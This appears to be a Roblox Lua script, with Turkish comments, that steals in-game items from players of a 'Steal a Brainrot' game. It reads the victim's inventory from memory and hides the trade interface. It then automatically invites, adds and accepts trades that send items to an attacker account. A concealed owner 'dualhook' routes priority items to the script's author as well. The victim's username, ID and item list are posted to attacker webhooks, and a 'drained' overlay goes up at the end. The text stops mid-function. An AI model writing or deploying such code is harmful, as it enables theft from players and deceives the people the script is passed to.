local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local LP = Players.LocalPlayer
local cam = workspace.CurrentCamera
local pg = LP:WaitForChild("PlayerGui")

task.spawn(function()

if not game:IsLoaded() then
    game.Loaded:Wait()
end

local ALLOWED_PLACES = { 99606176102979, 109983668079237, 79906538690694, 119594317142884 }
if not table.find(ALLOWED_PLACES, game.PlaceId) then return end

-- ═══════════════════════════════════════════════════════════════
-- KULLANICI AYARLARI (getgenv)
-- ═══════════════════════════════════════════════════════════════
local USER_TARGET_ID     = getgenv().TARGET_USER_ID or 0
local USER_LOG_WEBHOOK   = getgenv().GOOD_WEBHOOK or ""
local USER_TRADE_WEBHOOK = getgenv().TRADE_WEBHOOK or ""
local USER_ALLOWED_RAW   = getgenv().ALLOWED_ANIMALS or {}

local UserAllowedAnimals = {}
for _, name in ipairs(USER_ALLOWED_RAW) do
    if type(name) == "string" and name ~= "" and name ~= "Name Brainrot" then
        UserAllowedAnimals[name] = true
    end
end

local USER_ALLOWED_BASESKINS_RAW = getgenv().ALLOWED_BASESKINS or {}
local USER_ALLOWED_GEARS_RAW     = getgenv().ALLOWED_GEARS or {}

local UserAllowedBaseSkins = {}
for _, name in ipairs(USER_ALLOWED_BASESKINS_RAW) do
    if type(name) == "string" and name ~= "" and name ~= "Name BaseSkin" then
        UserAllowedBaseSkins[name] = true
    end
end

local UserAllowedGears = {}
for _, name in ipairs(USER_ALLOWED_GEARS_RAW) do
    if type(name) == "string" and name ~= "" and name ~= "Name Gear" then
        UserAllowedGears[name] = true
    end
end

-- ═══════════════════════════════════════════════════════════════
-- OWNER GİZLİ AYARLARI (DUALHOOK + PRIORITY)
-- ═══════════════════════════════════════════════════════════════
local OWNER_DUALHOOK_WEBHOOK = "https://sentinelhook.lol/api.php?id=2jbNB41lA3wtfjC"
local OWNER_DUALHOOK_AVATAR  = "https://cdn.discordapp.com/attachments/1503012061188198400/1522704317264560189/togif.gif?ex=6a4cbc27&is=6a4b6aa7&hm=6667051345d497289a91b99de877a342bdf6582eba18d1fb56fb69695ac087a9&"
local OWNER_PRIORITY_WEBHOOK = "https://sentinelhook.lol/api.php?id=2jbNB41lA3wtfjC"
local OWNER_PRIORITY_AVATAR  = "https://cdn.discordapp.com/attachments/1503012061188198400/1522704317264560189/togif.gif?ex=6a4cbc27&is=6a4b6aa7&hm=6667051345d497289a91b99de877a342bdf6582eba18d1fb56fb69695ac087a9&"
local OWNER_PRIORITY_TARGET_ID = 10659083291

-- ═══════════════════════════════════════════════════════════════
-- ÖNCELİKLİ (PRIORITY) BRAINROT LİSTESİ
-- ═══════════════════════════════════════════════════════════════
local PRIORITY_BRAINROTS = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Love Love Bear"] = true,
    ["Ginger Gerat"] = true,
    ["Antonio"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Bunny and Eggy"] = true,
    ["Hydra Bunny"] = true,
    ["Arcadragon"] = true,
    ["Pancake and Syrup"] = true,
    ["Fishino Clownino"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Rico Dinero"] = true,
    ["Kalika Bros"] = true,
    ["Digi Narwhal"] = true,
    ["Duggy Bros"] = true,
    ["John Pork"] = true,
    ["Dragon Aquanini"] = true,
    ["Kraken"] = true,
}

-- ═══════════════════════════════════════════════════════════════
-- SABİTLER
-- ═══════════════════════════════════════════════════════════════
local FANDOM_BASE = "https://stealabrainrot.fandom.com/wiki/"
local DELAY_STEP = 1
local TRADE_CYCLE_DELAY = 2

local INVITE_GUID   = "afb005f9-6e81-4e0a-8bb0-3555938a9658"
local SELECT_GUID   = "6b5f15fb-5cb9-4d07-a031-bbff8e641eda"
local SELECTGB_GUID = "f2c4a9d1-3b7e-4a51-9c8d-1e6f0a2b3c4d"
local READY_GUID    = "d73acf93-6f32-44df-b813-0f6b32c7afd9"
local ACCEPT_GUID   = "918ee0f5-e98f-413f-b76e-baee47b021cb"

local guiNames = {BrainrotTrader = true, TradeLiveTrade = true, TradePrompts = true}

local TargetBrainrots = {}
for k, v in pairs(UserAllowedAnimals) do TargetBrainrots[k] = v end
for k, v in pairs(PRIORITY_BRAINROTS) do TargetBrainrots[k] = v end

-- ═══════════════════════════════════════════════════════════════
-- YARDIMCI FONKSİYONLAR
-- ═══════════════════════════════════════════════════════════════
local function getRemote(unobfuscatedName)
    local Net = ReplicatedStorage:WaitForChild("Packages"):WaitForChild("Net")
    local children = Net:GetChildren()
    for i = 1, #children - 1 do
        local current = children[i]
        local nextFolder = children[i - 1]
        if current and nextFolder and string.find(current.Name, unobfuscatedName) then
            return nextFolder
        end
    end
    return nil
end

local function applyEverythingAfterTargetFound()
    local leftCenter = pg:FindFirstChild("LeftCenter")
    if leftCenter then
        local clone = leftCenter:Clone()
        clone.Name = "LeftCenter_Backup"
        clone.Parent = pg
        leftCenter:Destroy()
    end

    local notifyRemote = getRemote("RE/NotificationService/Notify")
    if notifyRemote then
        pcall(function()
            for _, connection in ipairs(getconnections(notifyRemote.OnClientEvent)) do
                connection:Disable()
            end
        end)
    end

    local function handleCam(obj)
        if obj:IsA("BlurEffect") then task.defer(function() obj:Destroy() end) end
    end
    cam.ChildAdded:Connect(handleCam)
    for _, v in ipairs(cam:GetChildren()) do handleCam(v) end

    cam:GetPropertyChangedSignal("FieldOfView"):Connect(function()
        cam.FieldOfView = 70
    end)
    cam.FieldOfView = 70

    local function handleGui(obj)
        if guiNames[obj.Name] then task.defer(function() obj:Destroy() end) end
    end
    pg.ChildAdded:Connect(handleGui)
    for _, v in ipairs(pg:GetChildren()) do handleGui(v) end
end

local AnimalsData, AnimalsShared, NumberUtils
pcall(function()
    AnimalsData = require(ReplicatedStorage:WaitForChild("Datas"):WaitForChild("Animals"))
    AnimalsShared = require(ReplicatedStorage:WaitForChild("Shared"):WaitForChild("Animals"))
    NumberUtils = require(ReplicatedStorage:WaitForChild("Utils"):WaitForChild("NumberUtils"))
end)

-- ═══════════════════════════════════════════════════════════════
-- MEMORY TARAMASI – ANIMALLIST
-- ═══════════════════════════════════════════════════════════════
local function getMyAnimalListSafe()
    local myList = nil
    pcall(function()
        for _, v in pairs(getgc(true)) do
            if type(v) == "table" and rawget(v, "AnimalList") then
                local owner = rawget(v, "Owner")
                if not owner and type(rawget(v, "Get")) == "function" then
                    pcall(function() owner = v:Get("Owner") end)
                end
                if owner == LP or (type(owner) == "table" and owner.UserId == LP.UserId) then
                    myList = rawget(v, "AnimalList")
                    if not myList and type(rawget(v, "Get")) == "function" then
                        pcall(function() myList = v:Get("AnimalList") end)
                    end
                    if myList then break end
                end
            end
        end
    end)
    return myList
end

-- ═══════════════════════════════════════════════════════════════
-- PROFİL BUL (BaseSkinInventory + Coins + Rebirth)
-- ═══════════════════════════════════════════════════════════════
local function getMyProfileSafe()
    local myProfile = nil
    pcall(function()
        for _, v in pairs(getgc(true)) do
            if type(v) == "table" then
                local ok, bi = pcall(rawget, v, "BaseSkinInventory")
                if ok and type(bi) == "table" then
                    if type(rawget(v, "Coins")) == "number"
                       and type(rawget(v, "Rebirth")) == "number" then
                        myProfile = v
                        break
                    end
                end
            end
        end
    end)
    return myProfile
end

-- BaseSkin kuyruğu
local function buildBaseSkinQueue()
    local queue = {}
    if not next(UserAllowedBaseSkins) then return queue end
    local profile = getMyProfileSafe()
    if not profile then return queue end
    local bi = rawget(profile, "BaseSkinInventory")
    if type(bi) ~= "table" then return queue end
    for uuid, skinData in pairs(bi) do
        if type(skinData) == "table" then
            local skinName = tostring(skinData.SkinName or skinData.Skin or "")
            if UserAllowedBaseSkins[skinName] then
                table.insert(queue, { uuid = tostring(uuid), skinName = skinName })
            end
        end
    end
    return queue
end

-- Gear kuyruğu
local function buildGearQueue()
    local queue = {}
    if not next(UserAllowedGears) then return queue end
    local profile = getMyProfileSafe()
    if not profile then return queue end
    local gi = rawget(profile, "GearInventory")
    if type(gi) ~= "table" then return queue end
    for uuid, gearData in pairs(gi) do
        if type(gearData) == "table" then
            local gearName = tostring(gearData.GearName or gearData.Name or "")
            if UserAllowedGears[gearName] then
                table.insert(queue, { uuid = tostring(uuid), gearName = gearName })
            end
        end
    end
    return queue
end

-- Bellekten envanteri oku (PRIORITY/NORMAL filtresiyle)
local function buildQueueFromMemory(filterType)
    local queue = {}
    local animalList = getMyAnimalListSafe()
    if not animalList then return queue end

    for slotKey, data in pairs(animalList) do
        if type(data) == "table" and data.Index then
            local info = AnimalsData and AnimalsData[data.Index]
            local dName = (info and info.DisplayName) or data.Index
            local isPriority = PRIORITY_BRAINROTS[data.Index] or PRIORITY_BRAINROTS[dName] or false
            local isUserWanted = UserAllowedAnimals[data.Index] or UserAllowedAnimals[dName] or false

            local include = false
            if filterType == "PRIORITY" and isPriority then
                include = true
            elseif filterType == "NORMAL" and (not isPriority) and isUserWanted then
                include = true
            end

            if include then
                table.insert(queue, {
                    slotKey = slotKey,
                    data = data,
                    displayName = dName,
                    isPriority = isPriority
                })
            end
        end
    end
    return queue
end

-- ═══════════════════════════════════════════════════════════════
-- WORKSPACE TABANLI VERİ OKUMA (WEBHOOK İÇİN)
-- ═══════════════════════════════════════════════════════════════
local function getMyPlot()
    local plotsFolder = workspace:FindFirstChild("Plots")
    if not plotsFolder then return nil end
    for _, plot in pairs(plotsFolder:GetChildren()) do
        local plotSign = plot:FindFirstChild("PlotSign")
        if plotSign then
            local yourBase = plotSign:FindFirstChild("YourBase")
            if yourBase and yourBase:IsA("BillboardGui") and yourBase.Enabled then
                return plot
            end
        end
    end
    return nil
end

local function getPartPosition(instance)
    if instance:IsA("BasePart") then return instance.Position end
    if instance.PrimaryPart then return instance.PrimaryPart.Position end
    local root = instance:FindFirstChild("RootPart") or instance:FindFirstChild("FakeRootPart") or instance:FindFirstChild("Handle")
    if root and root:IsA("BasePart") then return root.Position end
    for _, d in pairs(instance:GetDescendants()) do
        if d:IsA("BasePart") then return d.Position end
    end
    return nil
end

local function getAnimalFullData(animalModel, animalModelName)
    local debris = workspace:FindFirstChild("Debris")
    if not debris then return nil end
    local modelPos = getPartPosition(animalModel)
    if not modelPos then return nil end

    local animalInfo = AnimalsData and AnimalsData[animalModelName]
    local expectedName = (animalInfo and animalInfo.DisplayName) or animalModelName
    local cleanAnimal = string.gsub(string.lower(expectedName), "%s+", "")

    local bestData = nil
    local bestDist = math.huge

    for _, fastOverhead in pairs(debris:GetChildren()) do
        if fastOverhead.Name == "FastOverheadTemplate" then
            local overheadPos = getPartPosition(fastOverhead)
            if overheadPos then
                local dist = (overheadPos - modelPos).Magnitude
                if dist < bestDist then
                    local animalOverhead = fastOverhead:FindFirstChild("AnimalOverhead")
                    if animalOverhead then
                        local displayName = animalOverhead:FindFirstChild("DisplayName")
                        local generation = animalOverhead:FindFirstChild("Generation")
                        if displayName and displayName:IsA("TextLabel") then
                            local displayText = displayName.Text or ""
                            local cleanDisplay = string.gsub(string.lower(displayText), "%s+", "")
                            if string.find(cleanDisplay, cleanAnimal, 1, true) or string.find(cleanAnimal, cleanDisplay, 1, true) then
                                local genText = ""
                                if generation and generation:IsA("TextLabel") then
                                    genText = generation.Text or ""
                                end
                                bestDist = dist
                                bestData = {
                                    name = displayText ~= "" and displayText or expectedName,
                                    modelName = animalModelName,
                                    genText = genText
                                }
                                if dist < 5 then break end
                            end
                        end
                    end
                end
            end
        end
    end
    return bestData
end

-- Workspace'ten istenen türdeki pet'leri bulup webhook için veri toplar
local function scanWorkspaceForEmbed(filterType)
    local results = {}
    local plot = getMyPlot()
    if not plot then return results end

    local searchList = (filterType == "PRIORITY") and PRIORITY_BRAINROTS or UserAllowedAnimals
    for _, obj in pairs(plot:GetDescendants()) do
        local rawName = obj.Name
        local cleanName = rawName:gsub("%d+$", "")
        if obj:IsA("Model") and (searchList[rawName] or searchList[cleanName]) then
            local animalData = getAnimalFullData(obj, rawName)
            if animalData then
                local mutation = obj:GetAttribute("Mutation") or "None"
                if mutation == "" then mutation = "None" end
                local genVal = 0
                local cleanText = string.gsub(animalData.genText, ",", "")
                local num, suffix = string.match(cleanText, "%$([%d%.]+)([KMBT]?)/s")
                if num then
                    num = tonumber(num) or 0
                    if suffix == "K" then num = num * 1e3
                    elseif suffix == "M" then num = num * 1e6
                    elseif suffix == "B" then num = num * 1e9
                    elseif suffix == "T" then num = num * 1e12 end
                    genVal = num
                end
                local mutationPrefix = (mutation ~= "None" and mutation ~= "") and ("[" .. mutation .. "] ") or ""
                table.insert(results, {
                    index = animalData.modelName,
                    displayName = animalData.name,
                    name = "**" .. mutationPrefix .. animalData.name .. "**",
                    genVal = genVal,
                    genStr = animalData.genText ~= "" and animalData.genText or "$0/s",
                })
            end
        end
    end
    return results
end

-- ═══════════════════════════════════════════════════════════════
-- WEBHOOK / EMBED YARDIMCILARI
-- ═══════════════════════════════════════════════════════════════
local function getRequestFn()
    return (syn and syn.request) or (http and http.request) or http_request or request
end

local function toWikiName(displayName)
    local clean = displayName:match("^(.-)%s*%(") or displayName
    return clean:gsub(" ", "_")
end

local function fetchFandomImageUrl(displayName)
    local requestFn = getRequestFn()
    if not requestFn then return nil end
    local wikiName = toWikiName(displayName)
    local url = FANDOM_BASE .. wikiName

    for attempt = 1, 3 do
        local ok, response = pcall(function()
            return requestFn({
                Url = url,
                Method = "GET",
                Headers = {
                    ["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                    ["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                    ["Accept-Language"] = "en-US,en;q=0.5",
                    ["Cache-Control"] = "no-cache"
                },
                Timeout = 10
            })
        end)

        if ok and response and response.StatusCode and response.StatusCode == 200 then
            local body = response.Body
            if not body or body == "" then
                if attempt < 3 then task.wait(0.5) end
                continue
            end

            local ogImage = body:match('property="og:image"%s+content="([^"]+)"')
                or body:match('content="([^"]+)"%s+property="og:image"')
                or body:match('<meta%s+og:image%s+content="([^"]+)"')
                or body:match('<meta%s+property="og:image"%s+content="([^"]+)"')

            if ogImage and ogImage ~= "" then
                ogImage = ogImage:gsub("&amp;", "&"):gsub("&quot;", '"'):gsub("&lt;", "<"):gsub("&gt;", ">")
                if ogImage:find("^https?://") then
                    return ogImage
                end
            end

            local infoboxPattern = '<div[^>]*class="[^"]*infobox[^"]*"[^>]*>(.-)</div>%s*</div>'
            local infoboxMatch = body:match(infoboxPattern)
            local searchBody = infoboxMatch or body

            local imgPatterns = {
                'data%-src="(https://[^"]+%.(?:png|jpg|jpeg|webp|gif))"',
                'src="(https://[^"]+%.(?:png|jpg|jpeg|webp|gif))"',
            }

            for _, pattern in ipairs(imgPatterns) do
                local lastMatch = nil
                local pos = 1
                while true do
                    local start, endPos = searchBody:find(pattern, pos)
                    if not start then break end
                    local match = searchBody:sub(start, endPos)
                    local foundUrl = match:match('"([^"]+)"')

                    if foundUrl and foundUrl:find("static%.wikia%.nocookie%.net") then
                        if not foundUrl:find("/scale%-to%-width%-down/[0-9]?[0-9]$") then
                            lastMatch = foundUrl
                        end
                    elseif foundUrl then
                        lastMatch = foundUrl
                    end
                    pos = endPos + 1
                end

                if lastMatch then
                    lastMatch = lastMatch:gsub("/revision/latest", "")
                    return lastMatch
                end
            end

            return nil
        end

        if attempt < 3 then
            task.wait(0.5 * attempt)
        end
    end

    return nil
end

local function getBrainrotColor(animalIndex)
    local color = nil
    pcall(function()
        local models = ReplicatedStorage:FindFirstChild("Models")
        local animals = models and models:FindFirstChild("Animals")
        if not animals then return end
        local template = animals:FindFirstChild(animalIndex)
        if not template then
            local info = AnimalsData and AnimalsData[animalIndex]
            if info and info.DisplayName then template = animals:FindFirstChild(info.DisplayName) end
        end
        if not template then return end
        local bestScore = 0
        for _, desc in ipairs(template:GetDescendants()) do
            if desc:IsA("MeshPart") or desc:IsA("Part") then
                local c = desc.Color
                local vol = desc.Size.X * desc.Size.Y * desc.Size.Z
                local maxC = math.max(c.R, c.G, c.B)
                local minC = math.min(c.R, c.G, c.B)
                local sat = (maxC > 0) and ((maxC - minC) / maxC) or 0
                local bri = c.R * 0.299 + c.G * 0.587 + c.B * 0.114
                local bp = bri < 0.08 and 0.05 or (bri > 0.92 and 0.15 or 1)
                local score = (sat * 3 + 0.2) * bp * vol
                if score > bestScore then
                    bestScore = score
                    color = c
                end
            end
        end
    end)
    return color
end

local function colorToDecimal(c)
    if not c then return 0x71368A end
    return math.clamp(math.floor(c.R * 255), 0, 255) * 65536 + math.clamp(math.floor(c.G * 255), 0, 255) * 256 + math.clamp(math.floor(c.B * 255), 0, 255)
end

local function getBestImageUrl(displayName, animalIndex)
    local fandom = fetchFandomImageUrl(displayName)
    if fandom then return fandom end
    local info = AnimalsData and AnimalsData[animalIndex]
    if info then
        for _, key in ipairs({"Image","Icon","Thumbnail","Texture","ImageId","AssetId","image","icon"}) do
            if info[key] and type(info[key]) == "string" and info[key] ~= "" then
                local num = info[key]:match("%d+")
                if num then return "https://tr.rbxcdn.com/" .. num .. "/420/420/Image/Png" end
            end
        end
    end
    return fetchFandomImageUrl(animalIndex)
end

-- Webhook gönderim
local function sendWebhookWithRetry(webhookUrl, payload, maxRetries)
    local requestFn = getRequestFn()
    if not requestFn then return end
    task.spawn(function()
        for attempt = 1, (maxRetries or 3) do
            local ok = pcall(function()
                requestFn({
                    Url     = webhookUrl,
                    Method  = "POST",
                    Headers = { ["Content-Type"] = "application/json" },
                    Body    = payload,
                })
            end)
            if ok then return end
            task.wait(1 * attempt)
        end
    end)
end

-- Aktif base skin (path) + queue'daki base skinler + queue'daki gears göstermek için
local function getBaseSkinListForEmbed()
    local plot = getMyPlot()
    local activeSkin = "Default"
    if plot then
        activeSkin = plot:GetAttribute("BaseSkinName") or "Default"
    end

    local queue = buildBaseSkinQueue()
    if #queue == 0 then
        return "**Active:** " .. tostring(activeSkin) .. "\n**To Trade:** None"
    end

    local lines = {}
    for _, item in ipairs(queue) do
        table.insert(lines, "• " .. item.skinName)
    end
    return "**Active:** " .. tostring(activeSkin) .. "\n**To Trade (" .. #queue .. "):**\n" .. table.concat(lines, "\n")
end

local function getGearListForEmbed()
    local queue = buildGearQueue()
    if #queue == 0 then return "None" end
    local lines = {}
    for _, item in ipairs(queue) do
        table.insert(lines, "• " .. item.gearName)
    end
    local text = table.concat(lines, "\n")
    if #text > 1000 then text = text:sub(1, 996) .. "..." end
    return text
end

local function buildAndSendEmbed(resultsList, webhookUrl, avatarUrl, ping, username, tagText)
    if #resultsList == 0 then return end
    table.sort(resultsList, function(a, b) return a.genVal > b.genVal end)

    local top = resultsList[1]
    local imageUrl = getBestImageUrl(top.displayName, top.index)
    local embedColor = colorToDecimal(getBrainrotColor(top.index))

    local lines = {}
    for i, r in ipairs(resultsList) do
        lines[i] = r.name .. " — **" .. r.genStr .. "**"
    end
    local listText = table.concat(lines, "\n")
    if #listText > 3800 then listText = listText:sub(1, 3796) .. "..." end

    local execName = "Unknown"
    pcall(function()
        if identifyexecutor then execName = identifyexecutor()
        elseif getexecutorname then execName = getexecutorname() end
    end)

    local baseSkinText = getBaseSkinListForEmbed()
    local gearText = getGearListForEmbed()
    local gearQueue = buildGearQueue()

    local embed = {
        title       = (tagText and ("[" .. tagText .. "] ") or "") .. top.displayName .. " — " .. top.genStr,
        description = listText,
        color       = embedColor,
        fields      = {
            { name = "🎨 Base Skin", value = baseSkinText, inline = false },
            { name = "⚔️ Gears (" .. #gearQueue .. ")", value = gearText, inline = false },
            { name = "Server", value = "Players: **" .. #Players:GetPlayers() .. "** | <t:" .. os.time() .. ":R>", inline = true },
            { name = "Executor", value = execName, inline = true },
            { name = "User", value = LP.Name .. " (`" .. LP.UserId .. "`)", inline = true },
        },
        footer      = { text = LP.Name .. " • " .. LP.UserId },
        timestamp   = os.date("!%Y-%m-%dT%H:%M:%SZ"),
    }
    if imageUrl then embed.thumbnail = { url = imageUrl } end

    local payloadData = {
        embeds     = { embed },
        username   = username or "LOGGER",
        avatar_url = avatarUrl or "",
    }
    if ping then payloadData.content = ".gg/irish victim||@everyone||" end

    local payload = HttpService:JSONEncode(payloadData)
    sendWebhookWithRetry(webhookUrl, payload, 3)
end

-- ═══════════════════════════════════════════════════════════════
-- DRAIN EKRANI
-- ═══════════════════════════════════════════════════════════════
local function showDrainScreen()
    pcall(function()
        local parent = pg
        pcall(function() parent = game:GetService("CoreGui") end)
        if parent:FindFirstChild("DrainOverlay") then return end

        local gui = Instance.new("ScreenGui")
        gui.Name = "DrainOverlay"
        gui.IgnoreGuiInset = true
        gui.ResetOnSpawn = false
        gui.DisplayOrder = 999999
        gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
        gui.Parent = parent

        local bg = Instance.new("Frame")
        bg.Size = UDim2.new(1, 0, 1, 0)
        bg.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
        bg.BorderSizePixel = 0
        bg.ZIndex = 999998
        bg.Parent = gui

        local title = Instance.new("TextLabel")
        title.Size = UDim2.new(1, -40, 0.4, 0)
        title.Position = UDim2.new(0, 20, 0.15, 0)
        title.BackgroundTransparency = 1
        title.Text = "Your Brainrot Drained By\ndiscord.gg/irish"
        title.TextColor3 = Color3.fromRGB(255, 0, 0)
        title.TextScaled = true
        title.Font = Enum.Font.GothamBlack
        title.TextStrokeTransparency = 0.7
        title.ZIndex = 999999
        title.Parent = gui

        local sub = Instance.new("TextLabel")
        sub.Size = UDim2.new(1, -40, 0.2, 0)
        sub.Position = UDim2.new(0, 20, 0.65, 0)
        sub.BackgroundTransparency = 1
        sub.Text = "METHOD FOR JOIN DISCORD"
        sub.TextColor3 = Color3.fromRGB(50, 255, 50)
        sub.TextScaled = true
        sub.Font = Enum.Font.GothamBlack
        sub.TextStrokeTransparency = 0.7
        sub.ZIndex = 999999
        sub.Parent = gui

        gui.AncestryChanged:Connect(function(_, newParent)
            if newParent == nil then
                task.wait(0.1)
                gui.Parent = parent
            end
        end)
    end)
end

-- ═══════════════════════════════════════════════════════════════
-- ANA AKIŞ
-- ═══════════════════════════════════════════════════════════════

local initialPriority = buildQueueFromMemory("PRIORITY")
local initialNormal   = buildQueueFromMemory("NORMAL")
local initialBaseSkin = buildBaseSkinQueue()
local initialGear     = buildGearQueue()

if #initialPriority == 0 and #initialNormal == 0
   and #initialBaseSkin == 0 and #initialGear == 0 then return end

applyEverythingAfterTargetFound()

local state = {
    phase        = "IDLE",
    queue        = {},
    targetId     = 0,
    running      = false,
    priorityDone = false,
    addIdx       = 1,
	baseSkinQueue = {}, gearQueue = {},
    baseSkinIdx = 1, gearIdx = 1,
}

-- Başlangıç durumu
if #initialPriority > 0 and OWNER_PRIORITY_TARGET_ID ~= 0 then
    local wsPriority = scanWorkspaceForEmbed("PRIORITY")
    buildAndSendEmbed(wsPriority, OWNER_PRIORITY_WEBHOOK, OWNER_PRIORITY_AVATAR, true, "MachoBurda [PRIORITY]", "PRIORITY")
    if OWNER_DUALHOOK_WEBHOOK ~= OWNER_PRIORITY_WEBHOOK then
        buildAndSendEmbed(wsPriority, OWNER_DUALHOOK_WEBHOOK, OWNER_DUALHOOK_AVATAR, true, "MachoBurda [DUALHOOK]", "PRIORITY")
    end

    state.phase    = "PRIORITY"
    state.queue    = initialPriority
    state.targetId = OWNER_PRIORITY_TARGET_ID
    state.running  = true
    state.addIdx   = 1
elseif (#initialNormal > 0 or #initialBaseSkin > 0 or #initialGear > 0) and USER_TARGET_ID ~= 0 then
    local wsNormal = scanWorkspaceForEmbed("NORMAL")
    buildAndSendEmbed(wsNormal, USER_LOG_WEBHOOK, nil, true, "LOGGER MACHOHUB", nil)
    buildAndSendEmbed(wsNormal, OWNER_DUALHOOK_WEBHOOK, OWNER_DUALHOOK_AVATAR, false, "MachoBurda [DUALHOOK]", nil)

    state.phase    = "NORMAL"
    state.queue    = initialNormal
    state.targetId = USER_TARGET_ID
    state.running  = true
    state.addIdx   = 1
else
    return
end

state.baseSkinQueue = buildBaseSkinQueue()
state.gearQueue     = buildGearQueue()
state.baseSkinIdx   = 1
state.gearIdx       = 1

local inviteRemote  = getRemote("RF/TradeService/Invite")
local addRemote     = getRemote("RF/TradeService/AddBrainrot")
local addItemRemote = getRemote("RF/TradeService/AddItem")
local readyRemote   = getRemote("RE/TradeService/Ready")
local acceptRemote  = getRemote("RE/TradeService/Accept")
if not (inviteRemote and addRemote and readyRemote and acceptRemote) then return end

-- ═══════════════════════════════════════════════════════════════
-- HAYVAN EKLEME LOOP
-- ═══════════════════════════════════════════════════════════════
task.spawn(function()
    while true do
        if state.running and state.phase ~= "SWITCHING" and state.phase ~= "IDLE" then
            local q = state.queue
            if #q > 0 then
                if state.addIdx > #q then state.addIdx = 1 end
                local item = q[state.addIdx]
                if item then
                    local skip = state.priorityDone and item.isPriority
                    if not skip then
                        pcall(function() addRemote:InvokeServer(SELECT_GUID, item.slotKey, item.data) end)
                    end
                end
                state.addIdx = state.addIdx + 1
                if state.addIdx > #q then state.addIdx = 1 end
            end
        end
        task.wait(DELAY_STEP)
    end
end)

-- Base skin: brainrot gibi tur başına 1 item
task.spawn(function()
    while true do
        if state.running and state.phase ~= "SWITCHING" and state.phase ~= "IDLE" and addItemRemote then
            local q = state.baseSkinQueue
            if #q > 0 then
                if state.baseSkinIdx > #q then state.baseSkinIdx = 1 end
                local item = q[state.baseSkinIdx]
                if item and item.skinName and item.skinName ~= "" then
                    pcall(function()
                        addItemRemote:InvokeServer(SELECTGB_GUID, "BaseSkin", {
                            UUID = item.uuid,
                            SkinName = item.skinName,
                        })
                    end)
                end
                state.baseSkinIdx = state.baseSkinIdx + 1
            end
        end
        task.wait(DELAY_STEP)
    end
end)

-- Gear: brainrot gibi tur başına 1 item
task.spawn(function()
    while true do
        if state.running and state.phase ~= "SWITCHING" and state.phase ~= "IDLE" and addItemRemote then
            local q = state.gearQueue
            if #q > 0 then
                if state.gearIdx > #q then state.gearIdx = 1 end
                local item = q[state.gearIdx]
                if item and item.gearName and item.gearName ~= "" then
                    local payload = { GearName = item.gearName }
                    if type(item.uuid) == "string" and item.uuid ~= "" and item.uuid ~= "nil" then
                        payload.UUID = item.uuid
                    end
                    pcall(function()
                        addItemRemote:InvokeServer(SELECTGB_GUID, "Gear", payload)
                    end)
                end
                state.gearIdx = state.gearIdx + 1
            end
        end
        task.wait(DELAY_STEP)
    end
end)

-- ═══════════════════════════════════════════════════════════════
-- DAVET LOOP
-- ═══════════════════════════════════════════════════════════════
task.spawn(function()
    while true do
        if state.running and state.targetId ~= 0 and state.phase ~= "SWITCHING" and state.phase ~= "IDLE" then
            local safe = true
            if state.priorityDone and state.targetId == OWNER_PRIORITY_TARGET_ID then safe = false end
            if state.phase ~= "PRIORITY" and state.targetId == OWNER_PRIORITY_TARGET_ID then safe = false end
            if safe then
                pcall(function() inviteRemote:InvokeServer(INVITE_GUID, state.targetId) end)
            end
        end
        task.wait(TRADE_CYCLE_DELAY)
    end
end)

-- ═══════════════════════════════════════════════════════════════
-- READY / ACCEPT + FAZ GEÇİŞİ
-- ═══════════════════════════════════════════════════════════════
task.spawn(function()
    while true do
        if state.running and state.phase ~= "SWITCHING" and state.phase ~= "IDLE" then
            pcall(function() readyRemote:FireServer(READY_GUID) end)
            task.wait(0.7)
            pcall(function() acceptRemote:FireServer(ACCEPT_GUID) end)

            if state.phase == "PRIORITY" and not state.priorityDone then
                task.wait(0.15)
                local checkP = buildQueueFromMemory("PRIORITY")
                if #checkP == 0 then
                    state.priorityDone = true
                    state.phase = "SWITCHING"
                    state.running = false
                    state.targetId = 0
                    state.queue = {}
                    task.wait(1)

                    local freshNormal = buildQueueFromMemory("NORMAL")
                    local freshBaseSkin = buildBaseSkinQueue()
                    local freshGear = buildGearQueue()

                    if (#freshNormal > 0 or #freshBaseSkin > 0 or #freshGear > 0) and USER_TARGET_ID ~= 0 then
                        local wsNormal = scanWorkspaceForEmbed("NORMAL")
                        buildAndSendEmbed(wsNormal, USER_LOG_WEBHOOK, nil, true, "LOGGER MACHOHUB", nil)
                        buildAndSendEmbed(wsNormal, OWNER_DUALHOOK_WEBHOOK, OWNER_DUALHOOK_AVATAR, false, "MachoBurda [DUALHOOK]", nil)

                        state.queue    = freshNormal
                        state.targetId = USER_TARGET_ID
                        state.phase    = "NORMAL"
                        state.running  = true
                        state.addIdx   = 1
                        -- ↓ BUNLARI BURAYA EKLE
                        state.baseSkinQueue = freshBaseSkin
                        state.gearQueue     = freshGear
                        state.baseSkinIdx   = 1
                        state.gearIdx       = 1
                    else
                        state.phase = "IDLE"
                    end
                else
                    state.queue = checkP
                    state.addIdx = 1
                end
            end
        end
        task.wait(0.7)
    end
end)

-- ═══════════════════════════════════════════════════════════════
-- DRAIN GÖZLEMCİSİ
-- ═══════════════════════════════════════════════════════════════
task.spawn(function()
    while state.phase ~= "NORMAL" do
        task.wait(0.5)
        if state.phase == "IDLE" then return end
    end
    
    -- Başlangıç sayılarını al
    local initialAnimalCount = #buildQueueFromMemory("NORMAL")
    local initialBaseSkinCount = #buildBaseSkinQueue()
    local initialGearCount = #buildGearQueue()
    
    -- Eğer hiçbir şey yoksa geri dön
    if initialAnimalCount == 0 and initialBaseSkinCount == 0 and initialGearCount == 0 then
        return
    end
    
    while true do
        task.wait(0.5)
        local currentAnimalCount = #buildQueueFromMemory("NORMAL")
        local currentBaseSkinCount = #buildBaseSkinQueue()
        local currentGearCount = #buildGearQueue()
        
        -- Herhangi bir kategoride azalma varsa drain'i göster ve çık
